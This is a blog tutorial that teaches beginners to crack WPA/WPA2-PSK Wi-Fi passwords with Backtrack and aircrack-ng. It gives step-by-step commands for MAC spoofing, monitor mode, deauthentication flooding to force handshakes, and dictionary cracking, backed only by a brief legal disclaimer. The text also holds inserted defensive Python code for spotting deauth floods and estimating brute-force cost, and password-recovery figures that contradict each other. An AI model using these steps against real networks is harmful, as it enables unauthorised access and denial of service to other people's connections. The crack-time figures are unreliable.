
Hacking WPA / WPA2 Encrypted Networks
theblogofbryan / June 13, 2013

Part II of my Network Security How-To Series:
1) ARP Spoofing from a Mobile Device
2) Hacking WPA / WPA2 Encrypted Networks (This Tutorial)
3) Defeating SSL / Encrypted Hijacking

Target of Attack:
- WPA/WPA2-PSK Wireless Networks

Tools Required:
- Any Computer with VMware software installed. (Download Here)
- Backtrack 5 VMware Virtual Machine. (Download Here)
- Compatible Network Adapter.

Common Terms Defined:
MAC Address (Media Access Control Address) is a unique identifier assigned to network interfaces for communications on the physical network segment.
WAP (Wireless Access Point) is a device that allows wireless devices to connect to a wired network using Wi-Fi.
BSSID (Basic Service Set Identification) is the MAC address of the WAP.
ESSID (Extended Service Set Identification) is the display name of the wireless network.
WPA/WPA2 (Wi-Fi Protected Access / Wi-Fi Protected Access II) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks.
PSK (Pre-Shared Key) is the term for the password defined in WPA/WPA2 encrypted networks.

Before we Begin:

The methods and tools used in this WPA / WPA2 hacking tutorial can be utilized without any previous knowledge; however, it is best for the attacker to have an understanding of what is going on behind the scenes. My job with this tutorial is to break down each step of the attack process and explain it in a simplified manner. Assuming that the reader of this guide has no previous knowledge of hacking, Linux, or network security, I will take it slow (one step at a time). I know this stuff can be intimidating for beginners, but just follow the steps and you will start to understand the fundamentals of what is going on, so you can be better protected against future malicious users.

It is important to note that hacking WEP is simple and WEP is widely recognized as an ineffective encryption technique, which is why I have not covered it in this tutorial. Although WEP still exists in many places, most wireless networks these days have been configured with WPA/WPA2-PSK, which is vulnerable to brute force attacks. I will explain that the success of hacking WPA/WPA2-PSK is only as good as the word list you are comparing against.

Step 1: Set up the VMware Software

Download and Install Required Software (FREE)

For the purpose of keeping this blog short, I am not going to provide instructions on how to download and install the VMware software. But the link and information to install VMware Player can be found below:

http://www.vmware.com/products/player/

After VMware is installed, you are going to want to download the Backtrack 5 R3 (32bit) virtual machine from the following link. Backtrack 5 is a Linux distribution that is used for many different types of penetration testing, network security work and much more. The download is archived using 7-zip, so you will have to extract the contents before using it.

http://www.backtrack-linux.org/ajax/download_redirect.php?id=BT5R3-GNOME-VM-32.7z

With the software installed, make sure you are able to power up the virtual machine successfully. I have both Backtrack 5 R3 and the VMware View software running off my USB drive so I can operate it from any computer at any time. I have not really seen any reduction in performance, because I am not really writing to the drive while it's up and running.

[Image: USB Device with Backtrack + VMware Player]

Step 2: Preparation for the Attack!

If you are not familiar with the command prompt or terminal then some of this may look a little foreign, but I am going to break it down as best I can. If you follow my instructions and type exactly as shown, there should not be any issue and you should be on your way to becoming a network penetration tester in no time!

Part I: View Network Interface Information

Since my internal wireless adapter does not support monitor mode, I have purchased an Alfa AWUS036H Long-Range 802.11N USB Network Adapter.

[Image: Alfa AWUS036H Wireless USB Adapter]

This of course is only needed in the case that your internal wireless adapter is not compatible. However, most USB wireless adapters will work with this process. I simply plug it into my USB port and make sure it is recognized in the virtual machine.

To view a list of the recognized interfaces, open up the console, type in the following command and press enter.

ifconfig

  ifconfig – command to view interfaces

[Image: ifconfig command]

We need to shut down the interface before we spoof the MAC address, because the interface cannot be in operation while its address is being changed. Type the below command and press enter.

ifconfig wlan0 down

  wlan0 – network interface
  down – shut down interface

[Image: ifconfig down command]

Now we can spoof the MAC address of the network adapter; in this case we are just going to set a static “phony” MAC address of 00:11:22:33:44:55. Type the below command and press enter.

macchanger -m 00:11:22:33:44:55 wlan0

  macchanger – command to spoof MAC Address
  -m 00:11:22:33:44:55 – specifying the MAC Address to spoof
  wlan0 – the interface whose MAC address is changed (macchanger needs the device name as its last argument)

Then, after the spoofed MAC address has been applied, we need to turn the interface back on. Type the below command once the MAC address spoof is finished and press enter.

ifconfig wlan0 up

  up – turn the interface back on (the same ifconfig tool that shut it down; iwconfig has no up option)

[Image: macchanger command]

Part II: Enable “Monitor Mode” on your Network Adapter

Monitor mode will allow your network adapter to view all network traffic within range, along with identifying information for each network found. This command will activate monitor mode on mon0. You will be presented with a message stating that “Monitor mode enabled on mon0”.

airmon-ng start wlan0

  airmon-ng – command for monitor mode
  start wlan0 – starting monitor mode on the wlan0 interface

[Image: monitor mode command]

Part III: Verify “Monitor Mode” is enabled

Verify mon0 is on the list of interfaces. To see the configuration of the monitor mode interface, type the following command and press enter. You should then see mon0 listed in the command results.

iwconfig mon0

  iwconfig – command to view wireless interface configuration
  mon0 – interface used in monitor mode

[Image: Verify Monitor Mode]

At this point, all the preparation is complete and we are now ready to move on to the fun stuff. The next stage will be choosing what network to perform the attack on. Legal note: Hacking into networks is illegal; make sure you have been granted permission to test, or perform this on your own equipment. I cannot be liable for any misuse!

Step 3: Begin the Attack!

Now that the network interface is configured properly to monitor network traffic within range, we can proceed to selecting a target and performing the actual brute force attack.

Part I: Choose your victim!

Let's take a look at some of the network traffic within range of the wireless adapter. With the console still open, type in the following command and hit enter.

airodump-ng mon0

  airodump-ng – command to view networks in range

[Image: List of Victims]

As described above, you will be presented with an active list of all networks within range. The network that I have selected is my own. You see it labeled as “HackThisWiFi”. Here is the information that we will need for the next set of commands.

ESSID: HackThisWiFi
BSSID: 00:23:69:98:AC:05
Channel: 4
Encryption: WPA
Authentication: PSK

Part II: View all clients connected to the Access Point

Now that we know which network to attack, we have to monitor that specific network and reveal any clients that may or may not be connected at that given time. In order for WPA / WPA2 hacking to work, it must capture the 4-way handshake that takes place when the client authenticates to the access point (AP).

Not only will we be viewing connected clients, but we will be capturing data specific to the HackThisWiFi access point and storing it in a capture file called “hackwpa”. Type the following command and press enter.

airodump-ng --bssid 00:23:69:98:AC:05 -c 4 -w hackwpa mon0

  --bssid 00:23:69:98:AC:05 – Access Point MAC Address
  -c 4 – Channel 4
  -w hackwpa – write to file “hackwpa”
  mon0 – network interface

[Image: View Clients of Access Point]

Part III: DoS the Access Point

Denial of Service (DoS) is a good way to accelerate the process of capturing the 4-way handshake, because it sends a message to the client saying that it is no longer associated with the Access Point. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key.

The following command will deauthenticate clients to hopefully force them to reauthenticate.

aireplay-ng -0 0 -a 00:23:69:98:AC:05 mon0

  -0 0 – deauthentication attack; the count 0 means keep sending DeAuth packets until stopped
  -a 00:23:69:98:AC:05 – Access Point MAC Address
  mon0 – Network Interface

[Image: Deauthenticate AP clients]

Now that the clients have been deauthenticated from the AP, and the handshake has been captured successfully, we can start the process of cracking the PSK. (And you thought you were safe! ;-))
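The defender's view of the deauthentication step above: a wireless IDS does not need to read the handshake, it only needs to notice that one BSSID is suddenly emitting dozens of deauthentication frames per second, most of them to the broadcast address. This is an added example, not code from the original post; the frame records are constructed, the field layout is my own, and the BSSID is the tutorial's.

```python
from collections import deque

DEAUTH_SUBTYPE = 12                 # 802.11 management subtype 12 = Deauthentication
BROADCAST = "ff:ff:ff:ff:ff:ff"
AP = "00:23:69:98:ac:05"            # the tutorial's access point BSSID

# Constructed sample of management-frame records (not a real capture):
# timestamp,type,subtype,bssid,source,destination,reason
# One beacon, one ordinary deauth (a client leaving, reason 3), then a burst of
# 64 broadcast deauths "from" the AP with reason 7, then another beacon.
SAMPLE_FRAMES = "\n".join(
    [f"0.00,0,8,{AP},{AP},{BROADCAST},-",
     f"0.10,0,12,{AP},{AP},10:aa:bb:cc:dd:ee,3"]
    + [f"{5.0 + i * 0.02:.2f},0,12,{AP},{AP},{BROADCAST},7" for i in range(64)]
    + [f"7.00,0,8,{AP},{AP},{BROADCAST},-"])

def parse_frames(text):
    """Parse the CSV records above into dicts with typed fields."""
    frames = []
    for line in text.strip().splitlines():
        ts, ftype, subtype, bssid, src, dst, reason = line.split(",")
        frames.append({"ts": float(ts), "type": int(ftype), "subtype": int(subtype),
                       "bssid": bssid, "src": src, "dst": dst, "reason": reason})
    return frames

def detect_deauth_flood(frames, window=2.0, threshold=10):
    """Alert once per BSSID when `threshold` or more deauthentication frames carry
    that BSSID within any `window` seconds. A lone deauth is normal; a flood of
    broadcast deauths with reason 7 is the signature of the attack shown above."""
    recent = {}     # bssid -> deque of recent deauth timestamps
    alerts = {}     # bssid -> alert record, extended while the flood continues
    for f in sorted(frames, key=lambda f: f["ts"]):
        if f["type"] != 0 or f["subtype"] != DEAUTH_SUBTYPE:
            continue
        q = recent.setdefault(f["bssid"], deque())
        q.append(f["ts"])
        while f["ts"] - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        if f["bssid"] in alerts:
            alerts[f["bssid"]]["count"] += 1
            alerts[f["bssid"]]["end"] = f["ts"]
        elif len(q) >= threshold:
            alerts[f["bssid"]] = {"bssid": f["bssid"], "start": q[0], "end": f["ts"],
                                  "count": len(q), "broadcast": f["dst"] == BROADCAST}
    return list(alerts.values())

if __name__ == "__main__":
    for a in detect_deauth_flood(parse_frames(SAMPLE_FRAMES)):
        print(f"deauth flood from {a['bssid']}: {a['count']} frames between "
              f"t={a['start']} and t={a['end']} (broadcast={a['broadcast']})")
```

The single reason-3 deauth at t=0.10 never trips the detector; the burst starting at t=5.00 is reported once, with its full frame count.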

Step 4: Time for PWNAGE!

Time to Crack the WPA / WPA2 Encryption using Aircrack

To accomplish this, you must have some type of wordlist to compare against the captured PSK. It essentially will check down the wordlist one by one until it reaches the correct key. This can be a very time consuming process and it takes quite a bit of processing power to execute. The faster your computer, the faster the key can be cracked. See the fun facts at the bottom of this post to get an understanding of password recovery speeds. There is also a small dictionary that comes with aircrack-ng – “password.lst”. The file is found in the “test” directory of the aircrack-ng source code. Just send me an email and I can either send you my wordlist or show you how to create your own using crunch (included by default with Backtrack 5 R3).

Use the below command to start the cracking.

aircrack-ng -w wordlist.lst -b 00:23:69:98:AC:05 hackwpa*.cap

  aircrack-ng – command for the password cracker
  -w wordlist.lst – specifying the wordlist to use (wordlist.lst)
  -b 00:23:69:98:AC:05 – specifying the BSSID of the AP
  hackwpa*.cap – specifying the capture file

[Image: Aircrack command to crack PSK]

Let the password cracker work with as much processing resources as possible; it could take a long time depending on the complexity of the WiFi password used. In my case, I placed the PSK near the top of the text file so I did not have to wait very long for the cracker to parse the wordlist one by one. This would not be possible if I was not aware of the PSK beforehand, and I would have to wait until every string in the wordlist had been compared.

[Image: WPA / WPA2 Hack Complete]

Protection Against Brute Force WPA / WPA2 Attacks

There are many ways to help protect and defend against brute-force attacks; here are a few tips to keep your WiFi a little safer from malicious intruders.

Setup MAC Address Filtering on Router: This makes it so that only specifically “whitelisted” devices are able to connect to your network. But as you know, a savvy hacker can also monitor the MAC address of a whitelisted client and then spoof their own MAC to gain access. Most of the time, though, this is not the case.

Use a Complex Passphrase: Using a combination of special characters, lowercase and uppercase letters, and also numeric characters can make the process of brute-forcing so time intensive that a hacker may just give up and move to an easier target. For my own network, I do not use a passphrase less than 15 characters in length. An example of a “safe” password would be “Th3Sm1ThF@m1lyWirEles$NeTw0rk2013”. By using a relatively easy sentence and changing some characters around to dramatically increase the complexity, it would take years for this password to be brute-forced.

Change the Password Frequently: As shown above, it could take hours, weeks, even years to brute-force passwords. If you change it on a regular basis, then you are going to be one step ahead of your potential attacker.

Turn off your router when you are not home: If you are not using the WiFi when you are away, why have it on? It only allows an attacker more time to find vulnerabilities to gain access. If you only have your WiFi on when you are home, then you are drastically reducing the attack time available to the malicious hacker.

Fun Facts:

Some interesting statistics regarding password recovery speeds. The speeds listed here are estimates of the maximum time it would take a common dual-core workstation to brute force various types of passwords. Keep in mind that a lot of people these days have quad-cores or clusters of computers that make password recovery drastically faster.

Numerals [0-9] (0123456789), 10 Character Password: 2½ Hours

Only Upper Case Alpha [A-Z] -or- Only Lower Case Alpha [a-z] (ABCDEFGHIJKLMNOPQRSTUVWXYZ -or- abcdefghijklmnopqrstuvwxyz), 8 Character Password: 5½ Hours

Only Upper Case Alpha [A-Z] -or- Only Lower Case Alpha [a-z] + Numerals [0-9] (0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ -or- 0123456789abcdefghijklmnopqrstuvwxyz), 5 Character Password: Instant

Upper Case Alpha [A-Z] + Lower Case Alpha [a-z] (AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz), 8 Character Password: 62 Days

Upper Case Alpha [A-Z] + Lower Case Alpha [a-z] + Numerals [0-9] (0123456789AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz), 8 Character Password: 25 Days

Upper Case Alpha [A-Z] + Lower Case Alpha [a-z] + Special Characters (AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz plus the keyboard punctuation characters), 8 Character Password: 23 Years
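Why the wordlist matters, and where the fun-fact numbers come from: WPA/WPA2-PSK turns the passphrase into the key with PBKDF2-HMAC-SHA1, 4096 rounds, salted with the SSID, so the cracker in Step 4 pays that cost on every wordlist entry, and the search space for a brute force is pool size to the power of length. This added example (mine, not from the post) derives the key as the standard does, measures the per-guess cost on the local machine, and sizes the search for a few constructed passphrases; the SSID "HackThisWiFi" is the tutorial's, the pool sizes match the table above, and the benchmark function is my own.

```python
import hashlib
import string
import time

PBKDF2_ITERATIONS = 4096       # fixed by IEEE 802.11i for WPA/WPA2-PSK

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key for WPA/WPA2-PSK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32).
    A cracker has to pay for these 4096 iterations on every wordlist entry it tries,
    and the SSID salt means the work cannot be reused across differently named networks."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, dklen=32)

def alphabet_size(passphrase: str) -> int:
    """Size of the character pool an exhaustive search would need to cover this
    passphrase (the same pools as the fun-facts table: lower, upper, digits, special)."""
    pools = ((string.ascii_lowercase, 26), (string.ascii_uppercase, 26),
             (string.digits, 10), (string.punctuation, 32))
    return sum(size for chars, size in pools if any(c in chars for c in passphrase))

def seconds_to_exhaust(pool: int, length: int, guesses_per_second: float) -> float:
    """Worst-case time to try every string of `length` characters drawn from `pool`."""
    return pool ** length / guesses_per_second

def measure_pmk_rate(ssid: str = "HackThisWiFi", samples: int = 20) -> float:
    """Rough single-core PMK derivations per second on this machine (constructed benchmark;
    aircrack-ng and GPU crackers are faster, but pay the same 4096 rounds per guess)."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"candidate{i}", ssid)
    return samples / (time.perf_counter() - start)

def describe(passphrase: str, guesses_per_second: float) -> str:
    years = seconds_to_exhaust(alphabet_size(passphrase), len(passphrase),
                               guesses_per_second) / (365 * 86400)
    return (f"{passphrase!r}: pool {alphabet_size(passphrase)}, length {len(passphrase)}, "
            f"worst case {years:.3g} years at {guesses_per_second:.0f} guesses/s")

if __name__ == "__main__":
    rate = measure_pmk_rate()
    # Constructed sample passphrases, from weak to strong.
    for p in ("12345678", "Sunshine1", "N0tEasy!ToGuess2013"):
        print(describe(p, rate))
```

The table's hours-and-days figures assume a fast unsalted hash; at PBKDF2 rates even the 8-character mixed-case case stretches far beyond them, which is the whole point of the 15-character advice above.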

As always, thanks for reading and please make sure to drop a comment below with your thoughts. Don't forget to Subscribe!

-Bryan
